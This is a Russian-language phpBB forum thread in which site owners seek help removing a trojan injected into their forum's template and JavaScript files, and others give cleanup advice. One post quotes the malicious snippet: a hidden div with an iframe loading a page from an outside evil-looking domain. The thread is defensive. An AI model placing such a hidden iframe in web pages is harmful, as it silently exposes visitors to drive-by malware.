Как убить Трояна?

Вопросы без привязки к версии. Установлена авточистка (2 года).
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения

Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение ;) ).
AdmninsCluba
phpBB 1.2.1
Сообщения: 22
Стаж: 18 лет 7 месяцев
Благодарил (а): 1 раз

Как убить Трояна?

Сообщение AdmninsCluba »

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html
Аватара пользователя
владимир1983
phpBB 3.2.6
Сообщения: 5954
Стаж: 15 лет
Откуда: Сергиев Посад
Благодарил (а): 295 раз
Поблагодарили: 287 раз

Re: Как убить Трояна?

Сообщение владимир1983 »

pavelkim писал(а):после его чистки
Поиск по файлам выполнял по известному вредоносному коду?
pavelkim писал(а):какие файлы посмотрет
Если
pavelkim писал(а):"Найти пользователя"
То смотри memberlist_search.html
И читай [FAQ] Шаблон форума, CSS и html, где что "ковырять"
За ваши деньги решу ваши проблемы. Стучи в ЛС.
Нет человека - нет проблемы. (c)
Аватара пользователя
pavelkim
phpBB 1.4.4
Сообщения: 113
Стаж: 15 лет 8 месяцев
Откуда: Беларусь

Re: Как убить Трояна?

Сообщение pavelkim »

владимир1983 писал(а):Поиск по файлам выполнял по известному вредоносному коду?
еще при чистке форума. Это было около месяца назад. Сам код не сохранил.

Просмотр файла memberlist_search.html ничего не дал. Так же смотрел forum_fn.js - тоже ничего не нашел. Не могу приложить их к сообщению. В ответ: Закачка была отклонена, так как вложение было определено как возможная атака. Означает ли это, что я что-то пропустил и в файлах действительно есть вредоносный код?
Аватара пользователя
Sheer
Former team member
Сообщения: 12113
Стаж: 18 лет 2 месяца
Откуда: Калининград не Кенигсберг
Благодарил (а): 36 раз
Поблагодарили: 1526 раз

Re: Как убить Трояна?

Сообщение Sheer »

pavelkim писал(а): Означает ли это, что я что-то пропустил и в файлах действительно есть вредоносный код?
Естественно. При закачке какого файла?
Изображение
Общие ошибки новичков (07.11.2005) & Как задавать вопросы
Мини FAQ
Если ничто другое не помогает, прочтите, наконец, инструкцию!
"Никакая инструкция не может перечислить всех обязанностей должностного лица, предусмотреть все отдельные случаи и дать вперёд соответствующие указания, а поэтому господа инженеры должны проявить инициативу и, руководствуясь знаниями своей специальности и пользой дела, принять все усилия для оправдания своего назначения".
Циркуляр Морского технического комитета №15 от 29.11.1910 г.
Аватара пользователя
pavelkim
phpBB 1.4.4
Сообщения: 113
Стаж: 15 лет 8 месяцев
Откуда: Беларусь

Re: Как убить Трояна?

Сообщение pavelkim »

Пробовал и .html и .txt
Каждый раз присутствовала угроза атаки при закачке.

Добавлено спустя 9 минут 44 секунды:
! Нашел трояна в следующих файлах:
simple_footer.html и simple_header.html
TheRain
phpBB 1.4.2
Сообщения: 53
Стаж: 19 лет 6 месяцев

Javascript вирус

Сообщение TheRain »

Здравствуйте.
Захожу сегодня на форум к себе и вижу что nod ругается. Кинулся разбираться. В итоге оказалось что каким-то образом оказались заражены вирусом(?) .js файлы.
Firebug показал вот такой кусок кода на страницах:

Код: Выделить всё

<div style="z-index: -10000; visibility: hidden; position: absolute; width: 50px; height: 50px;">
<iframe width="50" scrolling="no" height="50" frameborder="0" src="http://activatedreplacing.is-very-evil.org/index.php?28d9000e56c2a63080ff89c6f5357591">
</div> 
Подробнее об этом и о мерах лечения здесь.
Мне помогло.
Если тебе нечего делать, делай это не здесь...
Аватара пользователя
lucifer
phpBB 1.2.1
Сообщения: 24
Стаж: 13 лет 6 месяцев
Благодарил (а): 1 раз

Re: Как убить Трояна?

Сообщение lucifer »

....
Последний раз редактировалось lucifer 13.03.2014 20:58, всего редактировалось 2 раза.
Аватара пользователя
Sheer
Former team member
Сообщения: 12113
Стаж: 18 лет 2 месяца
Откуда: Калининград не Кенигсберг
Благодарил (а): 36 раз
Поблагодарили: 1526 раз

Re: Как убить Трояна?

Сообщение Sheer »

AdmninsCluba писал(а):Хостер сказал, что Троян залез через дырку форума. Где искать и исправлять проблему с Трояном? В паках управления, или Админ панели форума?
Вранье.
lucifer писал(а):А смена почтового адреса форума с forum@***.ru на обычный gmail`овский может стать брешью в защите форума?
Нет.
lucifer писал(а):Доступ к серверу не имею. Есть возможность удалить трояна через интернет?
Нет.
Изображение
Общие ошибки новичков (07.11.2005) & Как задавать вопросы
Мини FAQ
Если ничто другое не помогает, прочтите, наконец, инструкцию!
"Никакая инструкция не может перечислить всех обязанностей должностного лица, предусмотреть все отдельные случаи и дать вперёд соответствующие указания, а поэтому господа инженеры должны проявить инициативу и, руководствуясь знаниями своей специальности и пользой дела, принять все усилия для оправдания своего назначения".
Циркуляр Морского технического комитета №15 от 29.11.1910 г.
Аватара пользователя
владимир1983
phpBB 3.2.6
Сообщения: 5954
Стаж: 15 лет
Откуда: Сергиев Посад
Благодарил (а): 295 раз
Поблагодарили: 287 раз

Re: Как убить Трояна?

Сообщение владимир1983 »

AdmninsCluba писал(а):Хостер сказал
Пускай укажет на уязвимость.
В phpbb нет известных уязвимостей!
За ваши деньги решу ваши проблемы. Стучи в ЛС.
Нет человека - нет проблемы. (c)
Аватара пользователя
lucifer
phpBB 1.2.1
Сообщения: 24
Стаж: 13 лет 6 месяцев
Благодарил (а): 1 раз

Re: Как убить Трояна?

Сообщение lucifer »

....
Последний раз редактировалось lucifer 13.03.2014 20:58, всего редактировалось 2 раза.
Аватара пользователя
владимир1983
phpBB 3.2.6
Сообщения: 5954
Стаж: 15 лет
Откуда: Сергиев Посад
Благодарил (а): 295 раз
Поблагодарили: 287 раз

Re: Как убить Трояна?

Сообщение владимир1983 »

lucifer писал(а):Как это устранить?
Прочитать эту тему.
Используя FTP клиент найти вредоносный код и удалить его.
За ваши деньги решу ваши проблемы. Стучи в ЛС.
Нет человека - нет проблемы. (c)
Аватара пользователя
Sheer
Former team member
Сообщения: 12113
Стаж: 18 лет 2 месяца
Откуда: Калининград не Кенигсберг
Благодарил (а): 36 раз
Поблагодарили: 1526 раз

Re: Как убить Трояна?

Сообщение Sheer »

lucifer писал(а):Необходимо просканировать сайт вместе с форумом на вирусы?
Просканируйте. Только как вы это сделаете, если
lucifer писал(а):Доступ к серверу не имею
Изображение
Общие ошибки новичков (07.11.2005) & Как задавать вопросы
Мини FAQ
Если ничто другое не помогает, прочтите, наконец, инструкцию!
"Никакая инструкция не может перечислить всех обязанностей должностного лица, предусмотреть все отдельные случаи и дать вперёд соответствующие указания, а поэтому господа инженеры должны проявить инициативу и, руководствуясь знаниями своей специальности и пользой дела, принять все усилия для оправдания своего назначения".
Циркуляр Морского технического комитета №15 от 29.11.1910 г.
Аватара пользователя
lucifer
phpBB 1.2.1
Сообщения: 24
Стаж: 13 лет 6 месяцев
Благодарил (а): 1 раз

Re: Как убить Трояна?

Сообщение lucifer »

....
Последний раз редактировалось lucifer 13.03.2014 20:59, всего редактировалось 1 раз.
Аватара пользователя
Garret_Dark
phpBB 2.0.16
Сообщения: 1097
Стаж: 16 лет 3 месяца
Откуда: root/world/russia/
Благодарил (а): 17 раз
Поблагодарили: 24 раза

Re: Как убить Трояна?

Сообщение Garret_Dark »

lucifer писал(а):где он может засесть этот код?
Искать последние измененные файлы по дате. А в них искать код который видете на странице (Код трояна), меняете зараженные файлы на файлы из бэкапа (Если не сможете корректно удалить вредоносный код) или вообще все файлы восстанавливаете из бэкапа.
Ищите шелл - "левый" файл, опять таки файл по дате создания
lucifer писал(а):откуда мог взяться?
Обновитесь, поменяйте пароли на все, что хоть каким боком связано с форумом.
Аватара пользователя
lucifer
phpBB 1.2.1
Сообщения: 24
Стаж: 13 лет 6 месяцев
Благодарил (а): 1 раз

Re: Как убить Трояна?

Сообщение lucifer »

....
Последний раз редактировалось lucifer 13.03.2014 20:59, всего редактировалось 2 раза.
Аватара пользователя
Garret_Dark
phpBB 2.0.16
Сообщения: 1097
Стаж: 16 лет 3 месяца
Откуда: root/world/russia/
Благодарил (а): 17 раз
Поблагодарили: 24 раза

Re: Как убить Трояна?

Сообщение Garret_Dark »

lucifer писал(а): не имея доступа к серверу?
Хмм... Пропустил этот момент.
Не имея доступа к серверу, через админку можно править только файлы шаблона...
Я считаю, что код, скорее всего, появился после очистки кэша (Причем тут почтовый адрес то? Это просто запись в БД) и в этом случае как раз таки код находится в шаблоне, но искать его придется ручками, скорее всего он в overall_header.html если вообще в шаблоне...

Вернуться в «phpBB-пространство»